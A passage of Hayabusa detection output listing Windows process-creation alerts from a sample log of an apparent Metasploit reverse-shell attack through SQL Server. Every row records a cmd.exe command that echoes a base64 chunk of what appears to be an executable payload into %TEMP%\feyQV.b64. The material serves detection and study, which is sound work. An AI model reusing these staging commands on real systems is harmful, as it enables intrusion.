AB0ygAAbMoAAGTKAABcygAAUsoAAEjKAAA+ygAANMoAACrKAAAgygAAFsoAAArKAAACygAA+skAAOrJAADgyQAA1skAAMzJAADsywAA3M8AANDPAAAAAAAAus8AALDPAAAAAAAABwAAgAQAAIAJAACANAAAgA4AAIAMAACAFQAAgBcAAIADAACAEgAAgAoAAICXAACAcwAAgHQAAIBvAACAAAAAABMBX2lvYgAAWAJmcHJpbnRmALcCc3RyY2hyAACOAV9wY3R5cGUAYQBfX21iX2N1cl9tYXgAAEkCZXhpdAAAPQJhdG9pAAAVAV9pc2N0eXBlAACeAnByaW50ZgAArwJzaWduYWwAAJECbWFsbG9jAABAAmNhbGxvYwAATwJmZmx1c2gAAEwCZmNsb3NlAACcAnBlcnJvcgAAVwJmb3BlbgCkAnFzb3J0APEAX2Z0b2wAwQJzdHJuY3B5AMUCc3Ryc3RyAADAAnN0cm5jbXAAXgJmcmVlAADIAF9lcnJubwAAegBfX3BfX3dlbnZpcm9uAG0AX19wX19lbnZpcm9uAACnAnJlYWxsb2MAxAJzdHJzcG4AAJsCbW9kZgAAvAJzdHJlcnJvcgAA4wJ3Y3NjcHkAAOYCd2NzbGVuAACzAF9jbG9zZQAA6AJ3Y3NuY21wAMMCc3RycmNocgBNU1ZDUlQuZGxsAABVAF9fZGxsb25leGl0AIYBX29u>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x121c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:22.320 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ZXhpdADTAF9leGl0AEgAX1hjcHRGaWx0ZXIAZABfX3BfX19pbml0ZW52AFgAX19nZXRtYWluYXJncwAPAV9pbml0dGVybQCDAF9fc2V0dXNlcm1hdGhlcnIAAJ0AX2FkanVzdF9mZGl2AABqAF9fcF9fY29tbW9kZQAAbwBfX3BfX2Ztb2RlAACBAF9fc2V0X2FwcF90eXBlAADKAF9leGNlcHRfaGFuZGxlcjMAALcAX2NvbnRyb2xmcAAAHQNTZXRMYXN0RXJyb3IAAO4ARnJlZUVudmlyb25tZW50U3RyaW5nc1cATwFHZXRFbnZpcm9ubWVudFN0cmluZ3NXAAD1AUdsb2JhbEZyZWUAAAkBR2V0Q29tbWFuZExpbmVXAFYDVGxzQWxsb2MAAFcDVGxzRnJlZQCMAER1cGxpY2F0ZUhhbmRsZQA6AUdldEN1cnJlbnRQcm9jZXNzABoDU2V0SGFuZGxlSW5mb3JtYXRpb24AAC4AQ2xvc2VIYW5kbGUAwAFHZXRTeXN0ZW1UaW1lQXNGaWxlVGltZQC8AEZpbGVUaW1lVG9TeXN0ZW1UaW1lAADYAUdldFRpbWVab25lSW5mb3JtYXRpb24AALsARmlsZVRpbWVUb0xvY2FsRmlsZVRpbWUATgNTeXN0ZW1UaW1lVG9GaWxlVGltZQAATwNTeXN0ZW1UaW1lVG9UelNwZWNpZmljTG9jYWxUaW1lAEkDU2xlZXAA6gBGb3JtYXRNZXNzYWdlQQAAaQFHZXRMYXN0RXJyb3IAAIUDV2FpdEZvclNpbmdsZU9iamVjdABJAENyZWF0ZUV2ZW50QQAALANTZXRTdGRIYW5kbGUAABADU2V0RmlsZVBvaW50ZXIAAE0AQ3JlYXRlRmlsZUEAUABDcmVhdGVGaWxlVwCMAUdldE92ZXJsYXBwZWRSZXN1bHQAgwBEZXZpY2VJb0NvbnRyb2wAWgFHZXRGaWxlSW5mb3JtYXRpb25CeUhhbmRsZQAAUgJMb2NhbEZyZWUAXgFHZXRGaWxlVHlwZQBaAENyZWF0ZU11dGV4QQAAGQJJbml0aWFsaXplQ3JpdGljYWxTZWN0aW9uAHoARGVsZXRlQ3JpdGljYWxTZWN0aW9uAI8ARW50ZXJDcml0aWNhbFNlY3Rpb24AALgCUmVsZWFzZU11dGV4AAALA1NldEV2ZW50AABHAkxlYXZlQ3JpdGljYWxTZWN0aW9uAABRA1Rlcm1pbmF0ZVByb2Nlc3MAAFIBR2V0RXhpdENvZGVQcm9jZXNzAADfAUdldFZlcnNpb25FeEEAmAFHZXRQcm9jQWRkcmVzcwAASAJMb2FkTGlicmFyeUEAAJcDV3JpdGVGaWxlAKsCUmVhZEZpbGUAAIcCUGVla05hbWVkUGlwZQBLRVJORUwzMi5kbGwAAB0AQWxsb2NhdGVBbmRJbml0aWFsaXplU2lkAADhAEZy>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xce4 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:22.593 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ZWVTaWQAQURWQVBJMzIuZGxsAABXU09DSzMyLmRsbAA5AFdTQVNlbmQANABXU0FSZWN2AFdTMl8zMi5kbGwAAMUBX3N0cm5pY21wAL8BX3N0cmR1cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAZAAAAAEAAAABAAAAAQAAAAAAAACAw8kBAAAAAOALQQAyAAAAQgAAAEsAAABQAAAAWgAAAF8AAABiAAAAYwAAAGQAAAAlczogQ2Fubm90IHVzZSBjb25jdXJyZW5jeSBsZXZlbCBncmVhdGVyIHRoYW4gdG90YWwgbnVtYmVyIG9mIHJlcXVlc3RzCgAlczogSW52YWxpZCBDb25jdXJyZW5jeSBbUmFuZ2UgMC4uJWRdCgAAJXM6IGludmFsaWQgVVJMCgAAAAAlczogd3JvbmcgbnVtYmVyIG9mIGFyZ3VtZW50cwoAAFVzZXItQWdlbnQ6AEFjY2VwdDoASG9zdDoAAABQcm94eS1BdXRob3JpemF0aW9uOiBCYXNpYyAAUHJveHkgY3JlZGVudGlhbHMgdG9vIGxvbmcKAEF1dGhvcml6YXRpb246IEJhc2ljIAAAAEF1dGhlbnRpY2F0aW9uIGNyZWRlbnRpYWxzIHRvbyBsb25nCgAAAABDb29raWU6IAAAAAANCgAAQ2Fubm90IG1peCBQVVQgYW5kIEhFQUQKAAAAAENhbm5vdCBtaXggUE9TVCBhbmQgSEVBRAoAAABDYW5ub3QgbWl4IFBPU1QvUFVUIGFuZCBIRUFECgAAAEludmFsaWQgbnVtYmVyIG9mIHJlcXVlc3RzCgBuOmM6dDpiOlQ6cDp1OnY6cmtWaHdpeDp5Ono6QzpIOlA6QTpnOlg6ZGU6U3EAAABiZ2NvbG9yPXdoaXRlAAAAVG90YWwgb2YgJWQgcmVxdWVzdHMgY29tcGxldGVkCgAlcwoALi5kb25lCgBGaW5pc2hlZCAlZCByZXF1ZXN0cwoAAABhcHJfc29ja2V0X2Nvbm5lY3QoKQAAAAAKVGVzdCBhYm9ydGVkIGFmdGVyIDEwIGZhaWx1cmVzCgoAAAAKU2VydmVyIHRpbWVkIG91dAoKAGFwcl9wb2xsAAAAAGFwcl9zb2NrYWRkcl9pbmZvX2dldCgpIGZvciAlcwAAZXJyb3IgY3JlYXRpbmcgcmVxdWVzdCBidWZmZXI6IG91dCBvZiBtZW1vcnkKAAAASU5GTzogJXMgaGVhZGVyID09IAotLS0KJXMKLS0tCgBSZXF1ZXN0IHRvbyBsb25nCgAAACVzICVzIEhUVFAvMS4wDQolcyVzJXNDb250ZW50LWxlbmd0aDogJXUNCkNvbnRlbnQtdHlwZTogJXMNCiVzDQoAAAAAUFVUAFBPU1QAAAAAdGV4dC9wbGFpbgAAJXMgJXMgSFRUUC8xLjAN>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x20 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:22.867 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo CiVzJXMlcyVzDQoAAEhFQUQAAAAAR0VUAENvbm5lY3Rpb246IEtlZXAtQWxpdmUNCgAAAABBY2NlcHQ6ICovKg0KAAAAVXNlci1BZ2VudDogQXBhY2hlQmVuY2gvAAAAADIuMwBIb3N0OiAAAGFwcl9wb2xsc2V0X2NyZWF0ZSBmYWlsZWQAAAAoYmUgcGF0aWVudCklcwAALi4uAAoAAABbdGhyb3VnaCAlczolZF0gAAAAAEJlbmNobWFya2luZyAlcyAAAAAAJXM6ICVzICglZCkKAAAAAFNlbmQgcmVxdWVzdCBmYWlsZWQhCgAAAFNlbmQgcmVxdWVzdCB0aW1lZCBvdXQhCgAAAAAlcwklSTY0ZAklSTY0ZAklSTY0ZAklSTY0ZAklSTY0ZAoAAABzdGFydHRpbWUJc2Vjb25kcwljdGltZQlkdGltZQl0dGltZQl3YWl0CgAAAENhbm5vdCBvcGVuIGdudXBsb3Qgb3V0cHV0IGZpbGUAJWQsJS4zZgoAAAAAUGVyY2VudGFnZSBzZXJ2ZWQsVGltZSBpbiBtcwoAAABDYW5ub3Qgb3BlbiBDU1Ygb3V0cHV0IGZpbGUAdwAAACAgJWQlJSAgJTVJNjRkCgAgMTAwJSUgICU1STY0ZCAobG9uZ2VzdCByZXF1ZXN0KQoAAAAgMCUlICA8MD4gKG5ldmVyKQoAAApQZXJjZW50YWdlIG9mIHRoZSByZXF1ZXN0cyBzZXJ2ZWQgd2l0aGluIGEgY2VydGFpbiB0aW1lIChtcykKAABUb3RhbDogICAgICAlNUk2NGQgJTVJNjRkJTVJNjRkCgAAAABQcm9jZXNzaW5nOiAlNUk2NGQgJTVJNjRkJTVJNjRkCgAAAABDb25uZWN0OiAgICAlNUk2NGQgJTVJNjRkJTVJNjRkCgAAAAAgICAgICAgICAgICAgIG1pbiAgIGF2ZyAgIG1heAoAAFdBUk5JTkc6IFRoZSBtZWRpYW4gYW5kIG1lYW4gZm9yIHRoZSB0b3RhbCB0aW1lIGFyZSBub3Qgd2l0aGluIGEgbm9ybWFsIGRldmlhdGlvbgogICAgICAgIFRoZXNlIHJlc3VsdHMgYXJlIHByb2JhYmx5IG5vdCB0aGF0IHJlbGlhYmxlLgoAAAAAAAAAAEVSUk9SOiBUaGUgbWVkaWFuIGFuZCBtZWFuIGZvciB0aGUgdG90YWwgdGltZSBhcmUgbW9yZSB0aGFuIHR3aWNlIHRoZSBzdGFuZGFyZAogICAgICAgZGV2aWF0aW9uIGFwYXJ0LiBUaGVzZSByZXN1bHRzIGFyZSBOT1QgcmVsaWFibGUuCgBXQVJOSU5HOiBUaGUgbWVkaWFuIGFuZCBtZWFuIGZvciB0aGUgd2FpdGluZyB0aW1lIGFyZSBub3Qgd2l0aGluIGEgbm9ybWFsIGRldmlhdGlvbgogICAgICAgIFRo>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xc6c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:23.140 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ZXNlIHJlc3VsdHMgYXJlIHByb2JhYmx5IG5vdCB0aGF0IHJlbGlhYmxlLgoAAAAAAABFUlJPUjogVGhlIG1lZGlhbiBhbmQgbWVhbiBmb3IgdGhlIHdhaXRpbmcgdGltZSBhcmUgbW9yZSB0aGFuIHR3aWNlIHRoZSBzdGFuZGFyZAogICAgICAgZGV2aWF0aW9uIGFwYXJ0LiBUaGVzZSByZXN1bHRzIGFyZSBOT1QgcmVsaWFibGUuCgAAAAAAAABXQVJOSU5HOiBUaGUgbWVkaWFuIGFuZCBtZWFuIGZvciB0aGUgcHJvY2Vzc2luZyB0aW1lIGFyZSBub3Qgd2l0aGluIGEgbm9ybWFsIGRldmlhdGlvbgogICAgICAgIFRoZXNlIHJlc3VsdHMgYXJlIHByb2JhYmx5IG5vdCB0aGF0IHJlbGlhYmxlLgoAAABFUlJPUjogVGhlIG1lZGlhbiBhbmQgbWVhbiBmb3IgdGhlIHByb2Nlc3NpbmcgdGltZSBhcmUgbW9yZSB0aGFuIHR3aWNlIHRoZSBzdGFuZGFyZAogICAgICAgZGV2aWF0aW9uIGFwYXJ0LiBUaGVzZSByZXN1bHRzIGFyZSBOT1QgcmVsaWFibGUuCgAAAABXQVJOSU5HOiBUaGUgbWVkaWFuIGFuZCBtZWFuIGZvciB0aGUgaW5pdGlhbCBjb25uZWN0aW9uIHRpbWUgYXJlIG5vdCB3aXRoaW4gYSBub3JtYWwgZGV2aWF0aW9uCiAgICAgICAgVGhlc2UgcmVzdWx0cyBhcmUgcHJvYmFibHkgbm90IHRoYXQgcmVsaWFibGUuCgAAAEVSUk9SOiBUaGUgbWVkaWFuIGFuZCBtZWFuIGZvciB0aGUgaW5pdGlhbCBjb25uZWN0aW9uIHRpbWUgYXJlIG1vcmUgdGhhbiB0d2ljZSB0aGUgc3RhbmRhcmQKICAgICAgIGRldmlhdGlvbiBhcGFydC4gVGhlc2UgcmVzdWx0cyBhcmUgTk9UIHJlbGlhYmxlLgoAAAAAVG90YWw6ICAgICAgJTVJNjRkICU0STY0ZCAlNS4xZiAlNkk2NGQgJTdJNjRkCgAAV2FpdGluZzogICAgJTVJNjRkICU0STY0ZCAlNS4xZiAlNkk2NGQgJTdJNjRkCgAAUHJvY2Vzc2luZzogJTVJNjRkICU0STY0ZCAlNS4xZiAlNkk2NGQgJTdJNjRkCgAAQ29ubmVjdDogICAgJTVJNjRkICU0STY0ZCAlNS4xZiAlNkk2NGQgJTdJNjRkCgAAICAgICAgICAgICAgICBtaW4gIG1lYW5bKy8tc2RdIG1lZGlhbiAgIG1heAoAAAAACkNvbm5lY3Rpb24gVGltZXMgKG1zKQoAICAgICAgICAgICAgICAgICAgICAgICAgJS4yZiBrYi9zIHRvdGFsCgAAAAAgICAgICAgICAgICAg>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe64 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:23.414 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ICAgICAgICAgICAlLjJmIGtiL3Mgc2VudAoAVHJhbnNmZXIgcmF0ZTogICAgICAgICAgJS4yZiBbS2J5dGVzL3NlY10gcmVjZWl2ZWQKAFRpbWUgcGVyIHJlcXVlc3Q6ICAgICAgICUuM2YgW21zXSAobWVhbiwgYWNyb3NzIGFsbCBjb25jdXJyZW50IHJlcXVlc3RzKQoAAABUaW1lIHBlciByZXF1ZXN0OiAgICAgICAlLjNmIFttc10gKG1lYW4pCgAAAFJlcXVlc3RzIHBlciBzZWNvbmQ6ICAgICUuMmYgWyMvc2VjXSAobWVhbikKAAAAAEhUTUwgdHJhbnNmZXJyZWQ6ICAgICAgICVJNjRkIGJ5dGVzCgAAAABUb3RhbCBQVVQ6ICAgICAgICAgICAgICAlSTY0ZAoAAFRvdGFsIFBPU1RlZDogICAgICAgICAgICVJNjRkCgAAVG90YWwgdHJhbnNmZXJyZWQ6ICAgICAgJUk2NGQgYnl0ZXMKAAAAAEtlZXAtQWxpdmUgcmVxdWVzdHM6ICAgICVkCgBOb24tMnh4IHJlc3BvbnNlczogICAgICAlZAoAV3JpdGUgZXJyb3JzOiAgICAgICAgICAgJWQKACAgIChDb25uZWN0OiAlZCwgUmVjZWl2ZTogJWQsIExlbmd0aDogJWQsIEV4Y2VwdGlvbnM6ICVkKQoAAEZhaWxlZCByZXF1ZXN0czogICAgICAgICVkCgBDb21wbGV0ZSByZXF1ZXN0czogICAgICAlZAoAVGltZSB0YWtlbiBmb3IgdGVzdHM6ICAgJS4zZiBzZWNvbmRzCgAAAENvbmN1cnJlbmN5IExldmVsOiAgICAgICVkCgBEb2N1bWVudCBMZW5ndGg6ICAgICAgICAldSBieXRlcwoAAABEb2N1bWVudCBQYXRoOiAgICAgICAgICAlcwoAU2VydmVyIFBvcnQ6ICAgICAgICAgICAgJWh1CgAAAABTZXJ2ZXIgSG9zdG5hbWU6ICAgICAgICAlcwoAU2VydmVyIFNvZnR3YXJlOiAgICAgICAgJXMKAAoKAAA8L3RhYmxlPgoAAAAAAAAAPHRyICVzPjx0aCAlcz5Ub3RhbDo8L3RoPjx0ZCAlcz4lNUk2NGQ8L3RkPjx0ZCAlcz4lNUk2NGQ8L3RkPjx0ZCAlcz4lNUk2NGQ8L3RkPjwvdHI+CgAAADx0ciAlcz48dGggJXM+UHJvY2Vzc2luZzo8L3RoPjx0ZCAlcz4lNUk2NGQ8L3RkPjx0ZCAlcz4lNUk2NGQ8L3RkPjx0ZCAlcz4lNUk2NGQ8L3RkPjwvdHI+CgAAAAAAADx0ciAlcz48dGggJXM+Q29ubmVjdDo8L3RoPjx0ZCAlcz4lNUk2NGQ8L3RkPjx0ZCAlcz4lNUk2NGQ8L3RkPjx0ZCAlcz4lNUk2NGQ8L3RkPjwvdHI+CgA8dHIg>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x82c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:23.687 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo JXM+PHRoICVzPiZuYnNwOzwvdGg+IDx0aCAlcz5taW48L3RoPiAgIDx0aCAlcz5hdmc8L3RoPiAgIDx0aCAlcz5tYXg8L3RoPjwvdHI+CgA8dHIgJXM+PHRoICVzIGNvbHNwYW49ND5Db25ubmVjdGlvbiBUaW1lcyAobXMpPC90aD48L3RyPgoAAAA8dHIgJXM+PHRkIGNvbHNwYW49MiAlcz4mbmJzcDs8L3RkPjx0ZCBjb2xzcGFuPTIgJXM+JS4yZiBrYi9zIHRvdGFsPC90ZD48L3RyPgoAADx0ciAlcz48dGQgY29sc3Bhbj0yICVzPiZuYnNwOzwvdGQ+PHRkIGNvbHNwYW49MiAlcz4lLjJmIGtiL3Mgc2VudDwvdGQ+PC90cj4KAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+VHJhbnNmZXIgcmF0ZTo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JS4yZiBrYi9zIHJlY2VpdmVkPC90ZD48L3RyPgoAAAAAAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+UmVxdWVzdHMgcGVyIHNlY29uZDo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JS4yZjwvdGQ+PC90cj4KAAAAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPkhUTUwgdHJhbnNmZXJyZWQ6PC90aD48dGQgY29sc3Bhbj0yICVzPiVJNjRkIGJ5dGVzPC90ZD48L3RyPgoAAAA8dHIgJXM+PHRoIGNvbHNwYW49MiAlcz5Ub3RhbCBQVVQ6PC90aD48dGQgY29sc3Bhbj0yICVzPiVJNjRkPC90ZD48L3RyPgoAAAAAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPlRvdGFsIFBPU1RlZDo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JUk2NGQ8L3RkPjwvdHI+CgAAAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+VG90YWwgdHJhbnNmZXJyZWQ6PC90aD48dGQgY29sc3Bhbj0yICVzPiVJNjRkIGJ5dGVzPC90ZD48L3RyPgoAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPktlZXAtQWxpdmUgcmVxdWVzdHM6PC90aD48dGQgY29sc3Bhbj0yICVzPiVkPC90ZD48L3RyPgoAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+Tm9uLTJ4eCByZXNwb25zZXM6PC90aD48dGQgY29sc3Bhbj0yICVzPiVkPC90ZD48L3RyPgoAAAA8dHIgJXM+PHRkIGNvbHNwYW49NCAlcyA+ICAgKENvbm5lY3Q6ICVkLCBMZW5ndGg6ICVkLCBFeGNlcHRpb25zOiAlZCk8L3RkPjwvdHI+CgAAAAAAAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+RmFpbGVkIHJlcXVlc3Rz>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xd28 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:23.962 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo OjwvdGg+PHRkIGNvbHNwYW49MiAlcz4lZDwvdGQ+PC90cj4KAAAAAAA8dHIgJXM+PHRoIGNvbHNwYW49MiAlcz5Db21wbGV0ZSByZXF1ZXN0czo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JWQ8L3RkPjwvdHI+CgAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPlRpbWUgdGFrZW4gZm9yIHRlc3RzOjwvdGg+PHRkIGNvbHNwYW49MiAlcz4lLjNmIHNlY29uZHM8L3RkPjwvdHI+CgAAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPkNvbmN1cnJlbmN5IExldmVsOjwvdGg+PHRkIGNvbHNwYW49MiAlcz4lZDwvdGQ+PC90cj4KAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+RG9jdW1lbnQgTGVuZ3RoOjwvdGg+PHRkIGNvbHNwYW49MiAlcz4ldSBieXRlczwvdGQ+PC90cj4KAAAAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPkRvY3VtZW50IFBhdGg6PC90aD48dGQgY29sc3Bhbj0yICVzPiVzPC90ZD48L3RyPgoAAAAAAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+U2VydmVyIFBvcnQ6PC90aD48dGQgY29sc3Bhbj0yICVzPiVodTwvdGQ+PC90cj4KAAAAAAAAAAA8dHIgJXM+PHRoIGNvbHNwYW49MiAlcz5TZXJ2ZXIgSG9zdG5hbWU6PC90aD48dGQgY29sc3Bhbj0yICVzPiVzPC90ZD48L3RyPgoAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPlNlcnZlciBTb2Z0d2FyZTo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JXM8L3RkPjwvdHI+CgAKCjx0YWJsZSAlcz4KAAAAc29ja2V0IHJlY2VpdmUgYnVmZmVyAAAAc29ja2V0IHNlbmQgYnVmZmVyAABzb2NrZXQgbm9uYmxvY2sAc29ja2V0AABDb21wbGV0ZWQgJWQgcmVxdWVzdHMKAABDb250ZW50LWxlbmd0aDoAQ29udGVudC1MZW5ndGg6AGtlZXAtYWxpdmUAAEtlZXAtQWxpdmUAAExPRzogUmVzcG9uc2UgY29kZSA9ICVzCgAAAABXQVJOSU5HOiBSZXNwb25zZSBjb2RlIG5vdCAyeHggKCVzKQoAAAAANTAwAEhUVFAAAAAAU2VydmVyOgANCg0KAAAAAExPRzogaGVhZGVyIHJlY2VpdmVkOgolcwoAAABhcHJfc29ja2V0X3JlY3YAPC9wPgo8cD4KAAAAIExpY2Vuc2VkIHRvIFRoZSBBcGFjaGUgU29mdHdhcmUgRm91bmRhdGlvbiwgaHR0cDovL3d3dy5hcGFjaGUub3JnLzxicj4KAAAAAAAAAAAgQ29weXJpZ2h0>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x840 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:24.236 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo IDE5OTYgQWRhbSBUd2lzcywgWmV1cyBUZWNobm9sb2d5IEx0ZCwgaHR0cDovL3d3dy56ZXVzdGVjaC5uZXQvPGJyPgoAACBUaGlzIGlzIEFwYWNoZUJlbmNoLCBWZXJzaW9uICVzIDxpPiZsdDslcyZndDs8L2k+PGJyPgoAJFJldmlzaW9uOiA2NTU2NTQgJAA8cD4KAAAAAAAAAABMaWNlbnNlZCB0byBUaGUgQXBhY2hlIFNvZnR3YXJlIEZvdW5kYXRpb24sIGh0dHA6Ly93d3cuYXBhY2hlLm9yZy8KAAAAAABDb3B5cmlnaHQgMTk5NiBBZGFtIFR3aXNzLCBaZXVzIFRlY2hub2xvZ3kgTHRkLCBodHRwOi8vd3d3LnpldXN0ZWNoLm5ldC8KAAAAVGhpcyBpcyBBcGFjaGVCZW5jaCwgVmVyc2lvbiAlcwoAAAAAMi4zIDwkUmV2aXNpb246IDY1NTY1NCAkPgAAACAgICAtaCAgICAgICAgICAgICAgRGlzcGxheSB1c2FnZSBpbmZvcm1hdGlvbiAodGhpcyBtZXNzYWdlKQoAAAAgICAgLXIgICAgICAgICAgICAgIERvbid0IGV4aXQgb24gc29ja2V0IHJlY2VpdmUgZXJyb3JzLgoAAAAgICAgLWUgZmlsZW5hbWUgICAgIE91dHB1dCBDU1YgZmlsZSB3aXRoIHBlcmNlbnRhZ2VzIHNlcnZlZAoAAAAAICAgIC1nIGZpbGVuYW1lICAgICBPdXRwdXQgY29sbGVjdGVkIGRhdGEgdG8gZ251cGxvdCBmb3JtYXQgZmlsZS4KAAAAAAAAICAgIC1TICAgICAgICAgICAgICBEbyBub3Qgc2hvdyBjb25maWRlbmNlIGVzdGltYXRvcnMgYW5kIHdhcm5pbmdzLgoAAAAAICAgIC1kICAgICAgICAgICAgICBEbyBub3Qgc2hvdyBwZXJjZW50aWxlcyBzZXJ2ZWQgdGFibGUuCgAAICAgIC1rICAgICAgICAgICAgICBVc2UgSFRUUCBLZWVwQWxpdmUgZmVhdHVyZQoAICAgIC1WICAgICAgICAgICAgICBQcmludCB2ZXJzaW9uIG51bWJlciBhbmQgZXhpdAoAACAgICAtWCBwcm94eTpwb3J0ICAgUHJveHlzZXJ2ZXIgYW5kIHBvcnQgbnVtYmVyIHRvIHVzZQoAICAgIC1QIGF0dHJpYnV0ZSAgICBBZGQgQmFzaWMgUHJveHkgQXV0aGVudGljYXRpb24sIHRoZSBhdHRyaWJ1dGVzCgAAAAAAICAgICAgICAgICAgICAgICAgICBhcmUgYSBjb2xvbiBzZXBhcmF0ZWQgdXNlcm5hbWUgYW5kIHBhc3N3b3JkLgoAAAAAAAAAICAgIC1BIGF0dHJpYnV0ZSAgICBBZGQgQmFzaWMgV1dXIEF1dGhlbnRpY2F0>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe14 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
